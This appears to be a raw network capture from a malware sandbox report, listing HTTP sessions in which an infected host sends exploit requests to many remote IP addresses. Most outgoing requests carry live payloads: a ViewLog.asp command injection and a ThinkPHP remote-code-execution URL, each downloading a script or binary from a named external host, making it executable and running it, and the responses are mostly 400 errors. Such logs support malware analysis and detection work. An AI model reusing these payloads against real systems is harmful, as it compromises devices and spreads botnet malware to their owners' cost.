                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:37.482799053 CEST516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Sun, 14 Apr 2024 14:34:44 GMT
                                                        Server: lighttpd/1.4.35
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        243192.168.2.235245885.56.254.88080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:37.350101948 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:37.651444912 CEST404INHTTP/1.1 400 Bad Request
                                                        Date: Mon, 15 Apr 2024 04:28:21 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        244192.168.2.235332694.123.47.1578080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:37.688716888 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        245192.168.2.235592294.122.25.28080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:37.689902067 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        246192.168.2.235324495.100.73.7580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:37.783240080 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:38.078387022 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:35:37 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:37 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 30 37 61 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 33 37 26 23 34 36 3b 64 36 35 66 35 32 32 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 62 30 37 61 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 33 37 26 23 34 36 3b 64 36 35 66 35 32 32 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b07a7b5c&#46;1713105337&#46;d65f522<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;b07a7b5c&#46;1713105337&#46;d65f522</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        247192.168.2.235896695.214.235.8280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:37.823904991 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:38.156666994 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:35:37 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        248192.168.2.235083695.48.169.108080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:38.347671986 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        249192.168.2.233989294.46.28.1448080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:38.347917080 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:38.667064905 CEST1289INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:39 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        250192.168.2.233534231.200.103.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:38.365508080 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        251192.168.2.234766231.6.13.2268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:38.368349075 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        252192.168.2.233611685.75.228.268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:38.385886908 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        253192.168.2.235710831.44.133.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:38.386065006 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        254192.168.2.235241695.100.208.21180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:38.468439102 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:38.780174017 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:35:38 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:38 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 37 63 39 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 33 38 26 23 34 36 3b 35 32 32 39 30 65 39 39 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 34 37 63 39 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 33 38 26 23 34 36 3b 35 32 32 39 30 65 39 39 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;47c91002&#46;1713105338&#46;52290e99<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;47c91002&#46;1713105338&#46;52290e99</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        255192.168.2.234314895.216.204.4880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:38.477947950 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:38.801537991 CEST339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:35:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        256192.168.2.235255095.189.99.22380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:38.896312952 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:41.087902069 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:41.511890888 CEST322INHTTP/1.0 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 23:35:41 GMT
                                                        Server: Web Server
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
